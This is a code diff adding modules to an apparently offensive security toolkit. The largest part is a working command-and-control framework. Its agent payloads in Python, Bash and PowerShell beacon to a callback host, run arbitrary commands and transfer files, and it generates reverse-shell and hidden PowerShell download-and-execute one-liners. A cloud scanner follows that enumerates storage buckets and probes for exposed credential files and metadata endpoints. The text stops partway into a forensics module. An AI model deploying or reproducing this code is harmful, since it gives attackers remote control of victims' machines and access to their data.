/dev/null +++ b/modules/c2_framework.py @@ -0,0 +1,610 @@ +"""AUTARCH C2 Framework + +Multi-session command & control framework with agent generation, +listener management, task queuing, and file transfer. +""" + +DESCRIPTION = "Command & Control framework" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import socket +import base64 +import secrets +import threading +import struct +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, field + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Agent Templates ─────────────────────────────────────────────────────────── + +PYTHON_AGENT_TEMPLATE = '''#!/usr/bin/env python3 +"""AUTARCH C2 Agent — auto-generated.""" +import os,sys,time,socket,subprocess,json,base64,platform,random +C2_HOST="{host}" +C2_PORT={port} +BEACON_INTERVAL={interval} +JITTER={jitter} +AGENT_ID="{agent_id}" + +def beacon(): + while True: + try: + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.settimeout(30) + s.connect((C2_HOST,C2_PORT)) + # Register + info={{"id":AGENT_ID,"os":platform.system(),"hostname":socket.gethostname(), + "user":os.getenv("USER",os.getenv("USERNAME","unknown")), + "pid":os.getpid(),"arch":platform.machine()}} + s.send(json.dumps({{"type":"register","data":info}}).encode()+"\\n".encode()) + while True: + data=s.recv(65536) + if not data:break + try: + cmd=json.loads(data.decode()) + result=handle_cmd(cmd) + s.send(json.dumps(result).encode()+"\\n".encode()) + except:pass + except:pass + finally: + try:s.close() + except:pass + jitter_delay=BEACON_INTERVAL+random.uniform(-JITTER,JITTER) + time.sleep(max(1,jitter_delay)) + +def handle_cmd(cmd): + t=cmd.get("type","") + if t=="exec": + try: + r=subprocess.run(cmd["command"],shell=True,capture_output=True,text=True,timeout=60) + return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":r.stdout[-4096:],"stderr":r.stderr[-2048:],"rc":r.returncode}} + except Exception as e: + return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}} + elif t=="download": + try: + with open(cmd["path"],"rb") as f:d=base64.b64encode(f.read()).decode() + return{{"type":"file","task_id":cmd.get("task_id",""),"name":os.path.basename(cmd["path"]),"data":d}} + except Exception as e: + return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}} + elif t=="upload": + try: + with open(cmd["path"],"wb") as f:f.write(base64.b64decode(cmd["data"])) + return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":"Uploaded to "+cmd["path"]}} + except Exception as e: + return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}} + elif t=="sysinfo": + return{{"type":"result","task_id":cmd.get("task_id",""), + "stdout":json.dumps({{"os":platform.system(),"release":platform.release(), + "hostname":socket.gethostname(),"user":os.getenv("USER",os.getenv("USERNAME","")), + "pid":os.getpid(),"cwd":os.getcwd(),"arch":platform.machine()}})}} + elif t=="exit": + sys.exit(0) + return{{"type":"error","task_id":cmd.get("task_id",""),"error":"Unknown command"}} + +if __name__=="__main__":beacon() +''' + +BASH_AGENT_TEMPLATE = '''#!/bin/bash +# AUTARCH C2 Agent — auto-generated +C2_HOST="{host}" +C2_PORT={port} +INTERVAL={interval} +AGENT_ID="{agent_id}" +while true; do + exec 3<>/dev/tcp/$C2_HOST/$C2_PORT 2>/dev/null + if [ $? -eq 0 ]; then + echo '{{"type":"register","data":{{"id":"'$AGENT_ID'","os":"'$(uname -s)'","hostname":"'$(hostname)'","user":"'$(whoami)'","pid":'$$'}}}}' >&3 + while read -r line <&3; do + CMD=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('command',''))" 2>/dev/null) + TID=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('task_id',''))" 2>/dev/null) + if [ -n "$CMD" ]; then + OUTPUT=$(eval "$CMD" 2>&1 | head -c 4096) + echo '{{"type":"result","task_id":"'$TID'","stdout":"'$(echo "$OUTPUT" | base64 -w0)'"}}' >&3 + fi + done + exec 3>&- + fi + sleep $INTERVAL +done +''' + +POWERSHELL_AGENT_TEMPLATE = '''# AUTARCH C2 Agent — auto-generated +$C2Host="{host}" +$C2Port={port} +$Interval={interval} +$AgentId="{agent_id}" +while($true){{ + try{{ + $c=New-Object System.Net.Sockets.TcpClient($C2Host,$C2Port) + $s=$c.GetStream() + $w=New-Object System.IO.StreamWriter($s) + $r=New-Object System.IO.StreamReader($s) + $info=@{{type="register";data=@{{id=$AgentId;os="Windows";hostname=$env:COMPUTERNAME;user=$env:USERNAME;pid=$PID}}}}|ConvertTo-Json -Compress + $w.WriteLine($info);$w.Flush() + while($c.Connected){{ + $line=$r.ReadLine() + if($line){{ + $cmd=$line|ConvertFrom-Json + if($cmd.type -eq "exec"){{ + try{{$out=Invoke-Expression $cmd.command 2>&1|Out-String + $resp=@{{type="result";task_id=$cmd.task_id;stdout=$out.Substring(0,[Math]::Min($out.Length,4096))}}|ConvertTo-Json -Compress + }}catch{{$resp=@{{type="error";task_id=$cmd.task_id;error=$_.Exception.Message}}|ConvertTo-Json -Compress}} + $w.WriteLine($resp);$w.Flush() + }} + }} + }} + }}catch{{}} + Start-Sleep -Seconds $Interval +}} +''' + + +# ── C2 Server ───────────────────────────────────────────────────────────────── + +@dataclass +class Agent: + id: str + os: str = '' + hostname: str = '' + user: str = '' + pid: int = 0 + arch: str = '' + remote_addr: str = '' + first_seen: str = '' + last_seen: str = '' + status: str = 'active' # active, stale, dead + + +@dataclass +class Task: + id: str + agent_id: str + type: str + data: dict = field(default_factory=dict) + status: str = 'pending' # pending, sent, completed, failed + result: Optional[dict] = None + created_at: str = '' + completed_at: str = '' + + +class C2Server: + """Multi-session C2 server with agent management.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'c2') + os.makedirs(self._data_dir, exist_ok=True) + self._agents: Dict[str, Agent] = {} + self._tasks: Dict[str, Task] = {} + self._agent_tasks: Dict[str, list] = {} # agent_id -> [task_ids] + self._agent_sockets: Dict[str, socket.socket] = {} + self._listeners: Dict[str, dict] = {} + self._listener_threads: Dict[str, threading.Thread] = {} + self._stop_events: Dict[str, threading.Event] = {} + + # ── Listener Management ─────────────────────────────────────────────── + + def start_listener(self, name: str, host: str = '0.0.0.0', + port: int = 4444, protocol: str = 'tcp') -> dict: + """Start a C2 listener.""" + if name in self._listeners: + return {'ok': False, 'error': f'Listener "{name}" already exists'} + + stop_event = threading.Event() + self._stop_events[name] = stop_event + + listener_info = { + 'name': name, 'host': host, 'port': port, 'protocol': protocol, + 'started_at': datetime.now(timezone.utc).isoformat(), + 'connections': 0, + } + self._listeners[name] = listener_info + + def accept_loop(): + try: + srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + srv.settimeout(2.0) + srv.bind((host, port)) + srv.listen(20) + listener_info['socket'] = srv + + while not stop_event.is_set(): + try: + conn, addr = srv.accept() + listener_info['connections'] += 1 + threading.Thread(target=self._handle_agent, + args=(conn, addr, name), + daemon=True).start() + except socket.timeout: + continue + except Exception: + break + except Exception as e: + listener_info['error'] = str(e) + finally: + try: + srv.close() + except Exception: + pass + + t = threading.Thread(target=accept_loop, daemon=True) + t.start() + self._listener_threads[name] = t + + return {'ok': True, 'message': f'Listener "{name}" started on {host}:{port}'} + + def stop_listener(self, name: str) -> dict: + """Stop a C2 listener.""" + if name not in self._listeners: + return {'ok': False, 'error': 'Listener not found'} + stop_event = self._stop_events.pop(name, None) + if stop_event: + stop_event.set() + listener = self._listeners.pop(name, {}) + sock = listener.get('socket') + if sock: + try: + sock.close() + except Exception: + pass + self._listener_threads.pop(name, None) + return {'ok': True, 'message': f'Listener "{name}" stopped'} + + def list_listeners(self) -> List[dict]: + return [{k: v for k, v in l.items() if k != 'socket'} + for l in self._listeners.values()] + + def _handle_agent(self, conn: socket.socket, addr: tuple, listener: str): + """Handle incoming agent connection.""" + conn.settimeout(300) # 5 min timeout + try: + data = conn.recv(65536) + if not data: + return + msg = json.loads(data.decode().strip()) + if msg.get('type') != 'register': + conn.close() + return + + info = msg.get('data', {}) + agent_id = info.get('id', secrets.token_hex(4)) + + agent = Agent( + id=agent_id, + os=info.get('os', ''), + hostname=info.get('hostname', ''), + user=info.get('user', ''), + pid=info.get('pid', 0), + arch=info.get('arch', ''), + remote_addr=f'{addr[0]}:{addr[1]}', + first_seen=datetime.now(timezone.utc).isoformat(), + last_seen=datetime.now(timezone.utc).isoformat(), + ) + + self._agents[agent_id] = agent + self._agent_sockets[agent_id] = conn + if agent_id not in self._agent_tasks: + self._agent_tasks[agent_id] = [] + + # Process pending tasks for this agent + while True: + pending = [t for t in self._get_pending_tasks(agent_id)] + if not pending: + time.sleep(1) + # Check if still connected + try: + conn.send(b'') + except Exception: + break + agent.last_seen = datetime.now(timezone.utc).isoformat() + continue + + for task in pending: + try: + cmd = {'type': task.type, 'task_id': task.id, **task.data} + conn.send(json.dumps(cmd).encode() + b'\n') + task.status = 'sent' + + # Wait for result + conn.settimeout(60) + result_data = conn.recv(65536) + if result_data: + result = json.loads(result_data.decode().strip()) + task.result = result + task.status = 'completed' + task.completed_at = datetime.now(timezone.utc).isoformat() + else: + task.status = 'failed' + except Exception as e: + task.status = 'failed' + task.result = {'error': str(e)} + + agent.last_seen = datetime.now(timezone.utc).isoformat() + + except Exception: + pass + finally: + conn.close() + # Mark agent as stale if no longer connected + for aid, sock in list(self._agent_sockets.items()): + if sock is conn: + self._agent_sockets.pop(aid, None) + if aid in self._agents: + self._agents[aid].status = 'stale' + + def _get_pending_tasks(self, agent_id: str) -> List[Task]: + task_ids = self._agent_tasks.get(agent_id, []) + return [self._tasks[tid] for tid in task_ids + if tid in self._tasks and self._tasks[tid].status == 'pending'] + + # ── Agent Management ────────────────────────────────────────────────── + + def list_agents(self) -> List[dict]: + agents = [] + for a in self._agents.values(): + # Check if still connected + connected = a.id in self._agent_sockets + agents.append({ + 'id': a.id, 'os': a.os, 'hostname': a.hostname, + 'user': a.user, 'pid': a.pid, 'arch': a.arch, + 'remote_addr': a.remote_addr, + 'first_seen': a.first_seen, 'last_seen': a.last_seen, + 'status': 'active' if connected else a.status, + }) + return agents + + def remove_agent(self, agent_id: str) -> dict: + if agent_id in self._agent_sockets: + try: + self._agent_sockets[agent_id].close() + except Exception: + pass + del self._agent_sockets[agent_id] + self._agents.pop(agent_id, None) + self._agent_tasks.pop(agent_id, None) + return {'ok': True} + + # ── Task Queue ──────────────────────────────────────────────────────── + + def queue_task(self, agent_id: str, task_type: str, + data: dict = None) -> dict: + """Queue a task for an agent.""" + if agent_id not in self._agents: + return {'ok': False, 'error': 'Agent not found'} + + task_id = secrets.token_hex(4) + task = Task( + id=task_id, + agent_id=agent_id, + type=task_type, + data=data or {}, + created_at=datetime.now(timezone.utc).isoformat(), + ) + self._tasks[task_id] = task + if agent_id not in self._agent_tasks: + self._agent_tasks[agent_id] = [] + self._agent_tasks[agent_id].append(task_id) + + return {'ok': True, 'task_id': task_id} + + def execute_command(self, agent_id: str, command: str) -> dict: + """Shortcut to queue an exec task.""" + return self.queue_task(agent_id, 'exec', {'command': command}) + + def download_file(self, agent_id: str, remote_path: str) -> dict: + return self.queue_task(agent_id, 'download', {'path': remote_path}) + + def upload_file(self, agent_id: str, remote_path: str, + file_data: bytes) -> dict: + encoded = base64.b64encode(file_data).decode() + return self.queue_task(agent_id, 'upload', + {'path': remote_path, 'data': encoded}) + + def get_task_result(self, task_id: str) -> dict: + task = self._tasks.get(task_id) + if not task: + return {'ok': False, 'error': 'Task not found'} + return { + 'ok': True, + 'task_id': task.id, + 'status': task.status, + 'result': task.result, + 'created_at': task.created_at, + 'completed_at': task.completed_at, + } + + def list_tasks(self, agent_id: str = '') -> List[dict]: + tasks = [] + for t in self._tasks.values(): + if agent_id and t.agent_id != agent_id: + continue + tasks.append({ + 'id': t.id, 'agent_id': t.agent_id, 'type': t.type, + 'status': t.status, 'created_at': t.created_at, + 'completed_at': t.completed_at, + 'has_result': t.result is not None, + }) + return tasks + + # ── Agent Generation ────────────────────────────────────────────────── + + def generate_agent(self, host: str, port: int = 4444, + agent_type: str = 'python', + interval: int = 5, jitter: int = 2) -> dict: + """Generate a C2 agent payload.""" + agent_id = secrets.token_hex(4) + + if agent_type == 'python': + code = PYTHON_AGENT_TEMPLATE.format( + host=host, port=port, interval=interval, + jitter=jitter, agent_id=agent_id) + elif agent_type == 'bash': + code = BASH_AGENT_TEMPLATE.format( + host=host, port=port, interval=interval, + agent_id=agent_id) + elif agent_type == 'powershell': + code = POWERSHELL_AGENT_TEMPLATE.format( + host=host, port=port, interval=interval, + agent_id=agent_id) + else: + return {'ok': False, 'error': f'Unknown agent type: {agent_type}'} + + # Save to file + ext = {'python': 'py', 'bash': 'sh', 'powershell': 'ps1'}[agent_type] + filename = f'agent_{agent_id}.{ext}' + filepath = os.path.join(self._data_dir, filename) + with open(filepath, 'w') as f: + f.write(code) + + return { + 'ok': True, + 'agent_id': agent_id, + 'filename': filename, + 'filepath': filepath, + 'code': code, + 'type': agent_type, + } + + # ── One-liners ──────────────────────────────────────────────────────── + + def get_oneliner(self, host: str, port: int = 4444, + agent_type: str = 'python') -> dict: + """Generate a one-liner to deploy the agent.""" + if agent_type == 'python': + liner = (f"python3 -c \"import urllib.request,os,tempfile;" + f"f=tempfile.NamedTemporaryFile(suffix='.py',delete=False);" + f"f.write(urllib.request.urlopen('http://{host}:{port+1}/agent.py').read());" + f"f.close();os.system('python3 '+f.name+' &')\"") + elif agent_type == 'bash': + liner = f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1 &'" + elif agent_type == 'powershell': + liner = (f"powershell -nop -w hidden -c " + f"\"IEX(New-Object Net.WebClient).DownloadString" + f"('http://{host}:{port+1}/agent.ps1')\"") + else: + return {'ok': False, 'error': 'Unknown type'} + + return {'ok': True, 'oneliner': liner, 'type': agent_type} + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_c2_server() -> C2Server: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = C2Server() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for C2 Framework.""" + svc = get_c2_server() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ C2 FRAMEWORK ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — Start Listener ║") + print("║ 2 — Stop Listener ║") + print("║ 3 — List Agents ║") + print("║ 4 — Interact with Agent ║") + print("║ 5 — Generate Agent Payload ║") + print("║ 6 — Get One-Liner ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice == '1': + name = input(" Listener name: ").strip() or 'default' + port = int(input(" Port (4444): ").strip() or '4444') + r = svc.start_listener(name, port=port) + print(f" {r.get('message', r.get('error', ''))}") + elif choice == '2': + listeners = svc.list_listeners() + if not listeners: + print(" No listeners.") + continue + for l in listeners: + print(f" {l['name']} — {l['host']}:{l['port']} ({l['connections']} connections)") + name = input(" Stop which: ").strip() + if name: + r = svc.stop_listener(name) + print(f" {r.get('message', r.get('error', ''))}") + elif choice == '3': + agents = svc.list_agents() + if not agents: + print(" No agents.") + continue + for a in agents: + print(f" [{a['status']:6s}] {a['id']} — {a['user']}@{a['hostname']} " + f"({a['os']}) from {a['remote_addr']}") + elif choice == '4': + aid = input(" Agent ID: ").strip() + if not aid: + continue + print(f" Interacting with {aid} (type 'exit' to return)") + while True: + cmd = input(f" [{aid}]> ").strip() + if cmd in ('exit', 'quit', ''): + break + r = svc.execute_command(aid, cmd) + if not r.get('ok'): + print(f" Error: {r.get('error')}") + continue + # Poll for result + for _ in range(30): + time.sleep(1) + result = svc.get_task_result(r['task_id']) + if result.get('status') in ('completed', 'failed'): + if result.get('result'): + out = result['result'].get('stdout', '') + err = result['result'].get('stderr', '') + if out: + print(out) + if err: + print(f" [stderr] {err}") + break + else: + print(" [timeout] No response within 30s") + elif choice == '5': + host = input(" Callback host: ").strip() + port = int(input(" Callback port (4444): ").strip() or '4444') + atype = input(" Type (python/bash/powershell): ").strip() or 'python' + r = svc.generate_agent(host, port, atype) + if r.get('ok'): + print(f" Agent saved to: {r['filepath']}") + else: + print(f" Error: {r.get('error')}") + elif choice == '6': + host = input(" Host: ").strip() + port = int(input(" Port (4444): ").strip() or '4444') + atype = input(" Type (python/bash/powershell): ").strip() or 'python' + r = svc.get_oneliner(host, port, atype) + if r.get('ok'): + print(f"\n {r['oneliner']}\n") diff --git a/modules/cloud_scan.py b/modules/cloud_scan.py new file mode 100644 index 0000000..94398d1 --- /dev/null +++ b/modules/cloud_scan.py @@ -0,0 +1,448 @@ +"""AUTARCH Cloud Security Scanner + +AWS/Azure/GCP bucket enumeration, IAM misconfiguration detection, exposed +service scanning, and cloud resource discovery. +""" + +DESCRIPTION = "Cloud infrastructure security scanning" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import threading +from pathlib import Path +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + HAS_REQUESTS = True +except ImportError: + HAS_REQUESTS = False + + +# ── Cloud Provider Endpoints ───────────────────────────────────────────────── + +AWS_REGIONS = [ + 'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2', + 'eu-west-1', 'eu-west-2', 'eu-central-1', + 'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1', +] + +COMMON_BUCKET_NAMES = [ + 'backup', 'backups', 'data', 'dev', 'staging', 'prod', 'production', + 'logs', 'assets', 'media', 'uploads', 'images', 'static', 'public', + 'private', 'internal', 'config', 'configs', 'db', 'database', + 'archive', 'old', 'temp', 'tmp', 'test', 'debug', 'admin', + 'www', 'web', 'api', 'app', 'mobile', 'docs', 'documents', + 'reports', 'export', 'import', 'share', 'shared', +] + +METADATA_ENDPOINTS = { + 'aws': 'http://169.254.169.254/latest/meta-data/', + 'gcp': 'http://metadata.google.internal/computeMetadata/v1/', + 'azure': 'http://169.254.169.254/metadata/instance?api-version=2021-02-01', + 'digitalocean': 'http://169.254.169.254/metadata/v1/', +} + + +# ── Cloud Scanner ──────────────────────────────────────────────────────────── + +class CloudScanner: + """Cloud infrastructure security scanner.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'cloud_scan') + os.makedirs(self.data_dir, exist_ok=True) + self.results: List[Dict] = [] + self._jobs: Dict[str, Dict] = {} + + # ── S3 Bucket Enumeration ──────────────────────────────────────────── + + def enum_s3_buckets(self, keyword: str, prefixes: List[str] = None, + suffixes: List[str] = None) -> str: + """Enumerate S3 buckets with naming permutations. Returns job_id.""" + if not HAS_REQUESTS: + return '' + + job_id = f's3enum_{int(time.time())}' + self._jobs[job_id] = { + 'type': 's3_enum', 'status': 'running', + 'found': [], 'checked': 0, 'total': 0 + } + + def _enum(): + prefixes_list = prefixes or ['', 'dev-', 'staging-', 'prod-', 'test-', 'backup-'] + suffixes_list = suffixes or ['', '-backup', '-data', '-assets', '-logs', '-dev', + '-staging', '-prod', '-public', '-private'] + + bucket_names = set() + for pfx in prefixes_list: + for sfx in suffixes_list: + bucket_names.add(f'{pfx}{keyword}{sfx}') + # Add common patterns + for common in COMMON_BUCKET_NAMES: + bucket_names.add(f'{keyword}-{common}') + bucket_names.add(f'{common}-{keyword}') + + self._jobs[job_id]['total'] = len(bucket_names) + found = [] + + for name in bucket_names: + try: + # Check S3 bucket + url = f'https://{name}.s3.amazonaws.com' + resp = requests.head(url, timeout=5, allow_redirects=True) + self._jobs[job_id]['checked'] += 1 + + if resp.status_code == 200: + # Try listing + list_resp = requests.get(url, timeout=5) + listable = ' str: + """Enumerate Google Cloud Storage buckets. Returns job_id.""" + if not HAS_REQUESTS: + return '' + + job_id = f'gcsenum_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'gcs_enum', 'status': 'running', + 'found': [], 'checked': 0, 'total': 0 + } + + def _enum(): + names = set() + for suffix in ['', '-data', '-backup', '-assets', '-staging', '-prod', '-dev', '-logs']: + names.add(f'{keyword}{suffix}') + + self._jobs[job_id]['total'] = len(names) + found = [] + + for name in names: + try: + url = f'https://storage.googleapis.com/{name}' + resp = requests.head(url, timeout=5) + self._jobs[job_id]['checked'] += 1 + + if resp.status_code in (200, 403): + found.append({ + 'bucket': name, 'provider': 'gcp', + 'url': url, 'status': resp.status_code, + 'public': resp.status_code == 200 + }) + except Exception: + self._jobs[job_id]['checked'] += 1 + + self._jobs[job_id]['found'] = found + self._jobs[job_id]['status'] = 'complete' + + threading.Thread(target=_enum, daemon=True).start() + return job_id + + # ── Azure Blob Enumeration ─────────────────────────────────────────── + + def enum_azure_blobs(self, keyword: str) -> str: + """Enumerate Azure Blob Storage containers. Returns job_id.""" + if not HAS_REQUESTS: + return '' + + job_id = f'azureenum_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'azure_enum', 'status': 'running', + 'found': [], 'checked': 0, 'total': 0 + } + + def _enum(): + # Storage account names + accounts = [keyword, f'{keyword}storage', f'{keyword}data', + f'{keyword}backup', f'{keyword}dev', f'{keyword}prod'] + containers = ['$web', 'data', 'backup', 'uploads', 'assets', + 'logs', 'public', 'media', 'images'] + + total = len(accounts) * len(containers) + self._jobs[job_id]['total'] = total + found = [] + + for account in accounts: + for container in containers: + try: + url = f'https://{account}.blob.core.windows.net/{container}?restype=container&comp=list' + resp = requests.get(url, timeout=5) + self._jobs[job_id]['checked'] += 1 + + if resp.status_code == 200: + found.append({ + 'account': account, 'container': container, + 'provider': 'azure', 'url': url, + 'status': resp.status_code, 'public': True + }) + elif resp.status_code == 403: + found.append({ + 'account': account, 'container': container, + 'provider': 'azure', 'url': url, + 'status': 403, 'exists': True, 'public': False + }) + except Exception: + self._jobs[job_id]['checked'] += 1 + + self._jobs[job_id]['found'] = found + self._jobs[job_id]['status'] = 'complete' + + threading.Thread(target=_enum, daemon=True).start() + return job_id + + # ── Exposed Services ───────────────────────────────────────────────── + + def scan_exposed_services(self, target: str) -> Dict: + """Check for commonly exposed cloud services on a target.""" + if not HAS_REQUESTS: + return {'ok': False, 'error': 'requests not available'} + + services = [] + checks = [ + ('/server-status', 'Apache Status'), + ('/nginx_status', 'Nginx Status'), + ('/.env', 'Environment File'), + ('/.git/config', 'Git Config'), + ('/.aws/credentials', 'AWS Credentials'), + ('/wp-config.php.bak', 'WordPress Config Backup'), + ('/phpinfo.php', 'PHP Info'), + ('/debug', 'Debug Endpoint'), + ('/actuator', 'Spring Actuator'), + ('/actuator/env', 'Spring Env'), + ('/api/swagger.json', 'Swagger/OpenAPI Spec'), + ('/.well-known/security.txt', 'Security Policy'), + ('/robots.txt', 'Robots.txt'), + ('/sitemap.xml', 'Sitemap'), + ('/graphql', 'GraphQL Endpoint'), + ('/console', 'Console'), + ('/admin', 'Admin Panel'), + ('/wp-admin', 'WordPress Admin'), + ('/phpmyadmin', 'phpMyAdmin'), + ] + + for path, name in checks: + try: + url = f'{target.rstrip("/")}{path}' + resp = requests.get(url, timeout=5, allow_redirects=False) + if resp.status_code == 200: + # Check content for sensitive data + sensitive = False + body = resp.text[:2000].lower() + sensitive_indicators = [ + 'password', 'secret', 'access_key', 'private_key', + 'database', 'db_host', 'smtp_pass', 'api_key' + ] + if any(ind in body for ind in sensitive_indicators): + sensitive = True + + services.append({ + 'path': path, 'name': name, + 'url': url, 'status': resp.status_code, + 'size': len(resp.content), + 'sensitive': sensitive, + 'content_type': resp.headers.get('content-type', '') + }) + except Exception: + pass + + return { + 'ok': True, + 'target': target, + 'services': services, + 'count': len(services) + } + + # ── Metadata SSRF Check ────────────────────────────────────────────── + + def check_metadata_access(self) -> Dict: + """Check if cloud metadata service is accessible (SSRF indicator).""" + results = {} + for provider, url in METADATA_ENDPOINTS.items(): + try: + headers = {} + if provider == 'gcp': + headers['Metadata-Flavor'] = 'Google' + + resp = requests.get(url, headers=headers, timeout=3) + results[provider] = { + 'accessible': resp.status_code == 200, + 'status': resp.status_code, + 'content_preview': resp.text[:200] if resp.status_code == 200 else '' + } + except Exception: + results[provider] = {'accessible': False, 'error': 'Connection failed'} + + return {'ok': True, 'metadata': results} + + # ── Subdomain / DNS Enumeration for Cloud ──────────────────────────── + + def enum_cloud_subdomains(self, domain: str) -> Dict: + """Check for cloud-specific subdomains.""" + if not HAS_REQUESTS: + return {'ok': False, 'error': 'requests not available'} + + cloud_prefixes = [ + 'aws', 's3', 'ec2', 'lambda', 'api', 'cdn', + 'azure', 'blob', 'cloud', 'gcp', 'storage', + 'dev', 'staging', 'prod', 'admin', 'internal', + 'vpn', 'mail', 'smtp', 'imap', 'ftp', 'ssh', + 'db', 'database', 'redis', 'elastic', 'kibana', + 'grafana', 'prometheus', 'jenkins', 'gitlab', 'docker', + 'k8s', 'kubernetes', 'consul', 'vault', 'traefik', + ] + + found = [] + import socket + for prefix in cloud_prefixes: + subdomain = f'{prefix}.{domain}' + try: + ip = socket.gethostbyname(subdomain) + found.append({ + 'subdomain': subdomain, + 'ip': ip, + 'cloud_hint': self._identify_cloud_ip(ip) + }) + except socket.gaierror: + pass + + return {'ok': True, 'domain': domain, 'subdomains': found, 'count': len(found)} + + def _identify_cloud_ip(self, ip: str) -> str: + """Try to identify cloud provider from IP.""" + # Rough range checks + octets = ip.split('.') + if len(octets) == 4: + first = int(octets[0]) + if first in (3, 18, 52, 54, 35): + return 'AWS' + elif first in (20, 40, 52, 104, 13): + return 'Azure' + elif first in (34, 35, 104, 142): + return 'GCP' + return 'Unknown' + + # ── Job Management ─────────────────────────────────────────────────── + + def get_job(self, job_id: str) -> Optional[Dict]: + return self._jobs.get(job_id) + + def list_jobs(self) -> List[Dict]: + return [{'id': k, **v} for k, v in self._jobs.items()] + + # ── Save Results ───────────────────────────────────────────────────── + + def save_results(self, name: str, results: Dict) -> Dict: + """Save scan results.""" + filepath = os.path.join(self.data_dir, f'{name}.json') + with open(filepath, 'w') as f: + json.dump(results, f, indent=2) + return {'ok': True, 'path': filepath} + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_cloud_scanner() -> CloudScanner: + global _instance + if _instance is None: + _instance = CloudScanner() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Cloud Security module.""" + if not HAS_REQUESTS: + print(" Error: requests library required") + return + + scanner = get_cloud_scanner() + + while True: + print(f"\n{'='*60}") + print(f" Cloud Security Scanner") + print(f"{'='*60}") + print() + print(" 1 — Enumerate S3 Buckets (AWS)") + print(" 2 — Enumerate GCS Buckets (Google)") + print(" 3 — Enumerate Azure Blobs") + print(" 4 — Scan Exposed Services") + print(" 5 — Check Metadata Access (SSRF)") + print(" 6 — Cloud Subdomain Enum") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + kw = input(" Target keyword: ").strip() + if kw: + job_id = scanner.enum_s3_buckets(kw) + print(f" Scanning... (job: {job_id})") + while True: + job = scanner.get_job(job_id) + if job['status'] == 'complete': + for b in job['found']: + status = 'PUBLIC+LISTABLE' if b.get('listable') else \ + ('PUBLIC' if b.get('public') else 'EXISTS') + print(f" [{status}] {b['bucket']}") + if not job['found']: + print(" No buckets found") + break + time.sleep(1) + elif choice == '4': + target = input(" Target URL: ").strip() + if target: + result = scanner.scan_exposed_services(target) + for s in result['services']: + flag = ' [SENSITIVE]' if s.get('sensitive') else '' + print(f" {s['path']}: {s['name']}{flag}") + elif choice == '5': + result = scanner.check_metadata_access() + for provider, info in result['metadata'].items(): + status = 'ACCESSIBLE' if info.get('accessible') else 'blocked' + print(f" {provider}: {status}") + elif choice == '6': + domain = input(" Target domain: ").strip() + if domain: + result = scanner.enum_cloud_subdomains(domain) + for s in result['subdomains']: + print(f" {s['subdomain']} → {s['ip']} ({s['cloud_hint']})") diff --git a/modules/forensics.py b/modules/forensics.py new file mode 100644 index 0000000..5aeb5fb --- /dev/null +++ b/modules/forensics.py @@ -0,0 +1,595 @@ +"""AUTARCH Forensics Toolkit + +Disk imaging, file carving, metadata extraction, timeline building, +hash verification, and chain of custody logging for digital forensics. +""" + +DESCRIPTION = "Digital forensics & evidence analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import hashlib +import struct +import shutil +import subprocess +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any, Tuple + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +# Optional imports +try: + from PIL import Image as PILImage + from PIL.ExifTags import TAGS, GPSTAGS + HAS_PIL = True +except ImportError: + HAS_PIL = False + + +# ── File Signatures for Carving ────────────────────────────────────────────── + +FILE_SIGNATURES = [ + {'name': 'JPEG', 'ext': '.jpg', 'magic': b'\xFF\xD8\xFF', 'footer': b'\xFF\xD9', 'max_size': 50*1024*1024}, + {'name': 'PNG', 'ext': '.png', 'magic': b'\x89PNG\r\n\x1a\n', 'footer': b'IEND\xAE\x42\x60\x82', 'max_size': 50*1024*1024}, + {'name': 'GIF', 'ext': '.gif', 'magic': b'GIF8', 'footer': b'\x00\x3B', 'max_size': 20*1024*1024}, + {'name': 'PDF', 'ext': '.pdf', 'magic': b'%PDF', 'footer': b'%%EOF', 'max_size': 100*1024*1024}, + {'name': 'ZIP', 'ext': '.zip', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 500*1024*1024}, + {'name': 'RAR', 'ext': '.rar', 'magic': b'Rar!\x1a\x07', 'footer': None, 'max_size': 